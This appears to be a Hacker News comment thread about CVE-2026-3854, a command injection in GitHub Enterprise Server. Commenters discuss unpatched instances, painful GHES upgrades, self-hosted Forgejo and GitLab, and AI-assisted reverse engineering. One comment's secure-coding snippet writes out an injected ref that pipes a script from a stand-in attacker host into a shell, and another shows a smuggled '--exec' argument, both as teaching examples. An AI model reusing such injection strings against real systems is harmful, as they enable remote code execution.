They hint at their AI-augmented reversing methodology, which demonstrates one of the core strengths of current LLM agents. These models, trained extensively on code, can immensely speed up the process of understanding complex system internals.
Security research historically has two difficult components that build on one another:
1. Understanding complex system internals: uncovering the inner workings hidden by abstractions or interfaces
2. Finding vulnerabilities in these uncovered mechanisms
Sometimes both steps are equally hard. But often, once the real mechanisms are uncovered rather than assumed, finding the vulnerability is trivial.
CVE-2026-3854 is a case where the vulnerability is not plainly obvious after understanding the internals. Still, I am confident that this command injection would have been found quickly had it been exposed to a more traditional or accessible attack surface.
Anyone in here work at Wiz? Seems like they do pretty good work. Tool itself has survived extreme growth/feature bloat and still does pretty well. Security team has found some really cool stuff.
> April 28, 2026
> GitHub Enterprise Server customers should upgrade immediately - at the time of this writing, our data indicates that 88% of instances are still vulnerable
> Upgrade to GHES version 3.19.3 or later
https://docs.github.com/en/enterprise-server@3.19/admin/rele... :
> Enterprise Server 3.19.3 - March 10, 2026
88% of on-prem customers haven't applied a critical security fix from 7 weeks ago; that seems ... bad.
The question is how fragile the upgrade process is in large installations. In other enterprise software that shuffles around large amounts of data, I've seen the smallest things break the install and leave the ops team rolling back. It was like SharePoint in the past: you were rolling the dice every time you upgraded it.
It's incredibly fragile. It breaks the vast majority of the time and typically takes multiple rounds with support on-call to upgrade.
Unsurprising for a fourth-tier on-prem product created by cutting a continuously deployed application into releases.
The GitHub blog had an article saying that all patches must pass for github.com before merge, but failing GitHub Enterprise tests get a three-day window to be rectified.
If you're in the enterprise, you can update something outside of the normal schedule and be guaranteed to blow everything up (and be blamed), or you can stick with the schedule and hope for the best.
Guess which is usually picked ...
I assume a fair number of these on-prem customers restrict access to their GHES instance to a corporate VPN or something similar, and are planning an upgrade date that won't affect operations.
Any public instance should update immediately, though; it's not very hard to put together how to repro the vulnerability on your own from what they provide in the article, plus the fact that the GitHub Enterprise source is publicly available.
For sure - the last company I worked at that had GitHub Enterprise had it running on a private network only accessible within the company.
GHES is essentially unmaintained (perhaps “on life support” would be more charitable since they are certainly accepting payment for it) and has been so for about a decade. It requires a multi-hour downtime to apply even a patch-level release. They do not have any supported mechanism for HA upgrades. So even the most conscientious GHES customers lag the latest version because they can’t afford the downtime.
They are constantly telling all their GHES customers who complain about the severe flaws with the self-hosted appliance product to move to GitHub Enterprise Cloud, which is just regular GitHub.com, but who in their right mind would make that move nowadays??? At least GHES stays up during the daily github.com outages.
You can at least schedule the updates.
It's still a pretty annoying process, though.
Until GHES can do zero-downtime upgrades, nothing will get better. It's not on their roadmap, because as far as I'm aware the GHES team doesn't actually exist or is entirely focused on KLTO. It's a dead product that they wish didn't exist.
Pretty sure GitHub Enterprise Cloud is just Github hosting their enterprise server for you on Azure so you don't have to do the patching yourself.
GitHub Enterprise Cloud is on github.com and has more features: http://github.com/account/enterprises/new
They don't host GitHub Enterprise Server for you (though GitLab has something called GitLab Dedicated, where they host GitLab EE for you).
Why is there an EU GitHub status page, then? https://eu.githubstatus.com/uptime
Data residency is a thing.
It sure isn’t! GitHub Enterprise Cloud is simply an enterprise plan on the regular multitenant github.com. Your repositories are on disk right next to everyone else that uses github.com. There is no segregated storage or compute.
I wish they had a plan to literally host GHES for you because then more people in the company would be forced to reckon with how terrible GHES is from an operational perspective. It is stuck ca. 15-20 years ago conceptually.
People keep wanting to replace GitHub, but with what?
If GH is getting RCEs this late in the game, who wants to take the chance something else won't?
GitLab?
The people who suggest GitLab haven't used it. But I guess I could be tempted to try again...
https://status.gitlab.com/pages/history/5b36dc6502d06804c083...
If you could only choose from GitHub, GitLab, and Atlassian, then I suppose... But really, anything newer that stays in existence has to have focused on quality from early enough not to be defined by the path-dependence problems and bad choices of those three.
Given that GitHub is imploding under a lot of load, everyone leaving GitHub for something else actually makes GitHub better.
Ah, you assumed I meant SaaS GitLab. I meant the self-hosted version. I would never host our source code on a remote service.
Why not?
.... git?
replace it with git.
if you want a whole ui you can use something like forgejo, which has far fewer features, likely leading to fewer issues.
i want what github offers.
Enjoy your experience, there will certainly be no end to it.
I've had my account since 2008. ¯\_(ツ)_/¯
updated: changed the date to 2008.
my account shows 2001, but that's probably from projects I moved over... proof: https://github.com/lookfirst
GitHub launched in 2008, so that seems unlikely?
Just be careful your patronage doesn't lead to a sunk cost fallacy; a middle manager might just be betting on it
I have no ingrained loyalty, I just haven't found something better.
i just deleted my account of 2008. github sucks
You probably meant Forgejo. Codeberg is a Forgejo instance exclusive for FOSS projects.
I am personally now drawing a clear delineation between projects for my internal consumption (e.g. ansible scripts) and projects that have potential use for the general populace. For the former, I now host a private Forgejo instance. For the latter, I'll put it on GitHub but mirror it to my Forgejo instance.
I was pleasantly shocked that Forgejo is literally a single binary with a relatively easy config. All my internal services reference my Forgejo instance so, if I need to bail on GitHub, it's low friction for me.
A "reasonable" answer is probably a self-hosted Forgejo instance as the primary, canonical forge, with GitHub used as a mirror solely to take advantage of its free CI (while that lasts), and secrets hosted with a dedicated secret-hosting provider (I don't know what the provider du jour for this is these days).
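For what it's worth, the Git plumbing behind that mirroring setup is tiny. A minimal sketch in Python, assuming plain git does the mirroring (the remote name, paths, and URL are placeholders, not anyone's real setup):

    import subprocess

    def setup_github_mirror(repo_path: str, github_url: str) -> None:
        # Register GitHub as a push mirror; with --mirror=push, a plain
        # "git push github" force-updates all refs, including deletions.
        subprocess.run(
            ["git", "remote", "add", "--mirror=push", "github", github_url],
            cwd=repo_path, check=True,
        )

    def sync_mirror(repo_path: str) -> None:
        # Run this from a cron job or a post-receive hook on the Forgejo host.
        subprocess.run(["git", "push", "github"], cwd=repo_path, check=True)

(Forgejo can also configure push mirrors from the repo settings, which amounts to the same thing without the cron job.)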
Replace a whole 24/7 team of devops people with myself?
As much as I'd like to believe that I'm worthy, I'm not.
If the primary forge's only job is to host the actual Git infrastructure (the code, the MRs, the issues, maybe a wiki), it's a lot simpler than GitHub, and probably more within the scope of what people can reasonably administer themselves.
I hosted the first "java.apache.org". I was an early employee at CollabNet, and in the first discussions around starting subversion. I worked on Cloud Foundry.
This stuff isn't easy and I'm more than happy letting someone else do it at the expense of some downtime.
24/7 devops team for a forgejo instance? Come on mate...
24/7 devops team for github? Come on mate...
Is running a small forgejo instance for a team the same as running GitHub?
> solely to take advantage of its free CI, while that lasts
Eh, if you want to be able to keep working and deploying as normal during weekdays, I'd suggest also moving to Forgejo Actions if you're moving anyway. It's not 100% compatible, but more or less the same, and for the same money you'd get way faster runners on dedicated hardware.
For companies with resources for infrastructure, sure.
For OSS, the unlimited free minutes of multiplatform CI offered by GitHub are literally impossible to replace. Maintaining runners yourself to do the same things would be somewhere between a part- and full-time job.
> For OSS, the unlimited free minutes of multiplatform CI offered by GitHub are literally impossible to replace.
Yeah, how do you think the ecosystem got by before GitHub even had Actions? Y'all don't remember Travis CI et al. anymore?
There are more CI services than what Microsoft offers the world; sometimes it's worth looking around a bit.
> https://docs.codeberg.org/ci/
"Codeberg is a non-profit, community-led effort that provides services to free and open-source projects, such as Git hosting (using Forgejo), Pages, CI/CD and a Weblate instance."
Never say impossible.
Github is still "new" to a lot of us. OSS existed well before it, and will continue to exist well after.
just git
Self hosted gitlab behind a VPN.
The all-in-one Docker image and a couple of GitLab runners are all that small to medium-sized teams need. (Don't overcomplicate it with the Kubernetes version unless you really need it.)
We moved from GitHub to a self-hosted Forgejo instance about 6 months ago; works like a charm. Still can't believe how snappy Forgejo is / how laggy GitHub has become.
Is it public or locked down?
https://news.ycombinator.com/item?id=47941590
Another tour de force from Wiz, and a watershed moment in AI tooling enabling RE and compromise discovery.
It throws a wrench into the argument for not publishing your source on the grounds that AI will more easily compromise the code.
Another data point against doing security through obscurity.
I was impressed enough by AI finding vulnerabilities in source code, but doing it in binary executables is just amazing. This has so much potential, good and bad.
And yet another lesson to not treat data as instructions. Sanitize all user input!
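To make that concrete, here's a minimal sketch of the difference in Python; this is a stand-in illustration, not GitHub's actual code, and the ref handling is hypothetical:

    import subprocess

    def vulnerable_rev_parse(ref: str) -> None:
        # BAD: untrusted data spliced into a shell command line; a "ref"
        # like "HEAD; curl attacker.example | sh" runs an attacker command.
        subprocess.run(f"git rev-parse {ref}", shell=True)

    def safer_rev_parse(ref: str) -> None:
        # Better: argv as a list, so no shell ever parses it, plus
        # --end-of-options (Git 2.24+) so the ref can't masquerade as a
        # flag like --upload-pack=... either.
        subprocess.run(["git", "rev-parse", "--end-of-options", ref], check=True)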
Transformers were literally designed for translation.
As we have known for a while, they ended up being really good at translating source to source or text to source. It shouldn't be too surprising that they're also really good at understanding the asm version.
Doesn't make it any less impressive, but maybe less surprising.
Woah I wonder if they can tell if this has been exploited or not
My read is that this vulnerability is exploitable by an anonymous user. They absolutely have HTTP/Git-protocol logs that would indicate whether this was exploited, but if it was, they won't have logging about what actually got accessed and who did it, since the exploit was capable of standalone execution on the Git servers, which would by definition be capable of evading any logging.
This is just such an amateur hour vulnerability. Gluing strings together with no regard to what might be in them and then parsing them later...
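In the abstract, the anti-pattern is something like this hypothetical Python (function names and the "job line" format are made up for illustration): fields get glued into one string with no escaping, and a downstream parser splits attacker-controlled content back into extra tokens.

    def build_job_line(user: str, branch: str) -> str:
        # BAD: fields glued together with no escaping or quoting.
        return f"run {user} {branch}"

    def parse_job_line(line: str) -> list[str]:
        # Downstream, the line is split on whitespace, so whitespace
        # inside the attacker-controlled "branch" smuggles extra tokens.
        return line.split()

    tokens = parse_job_line(build_job_line("alice", "main --exec=evil"))
    print(tokens)  # ['run', 'alice', 'main', '--exec=evil']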
edit: I didn't mean it as a put-down of either the article or how they found the vulnerability, but it wasn't a constructive comment either way.
It's good to add information about what the vulnerability actually was, but please don't do it in the key of putdown. We're trying for something else here.
https://news.ycombinator.com/newsguidelines.html
The GitHub case will be taught in schools in a couple of years as an example of how to screw up an almost monopolistic position in the market. This is beyond bonkers.
Only if they take Skype off the syllabus first.
private equity: hold my beer!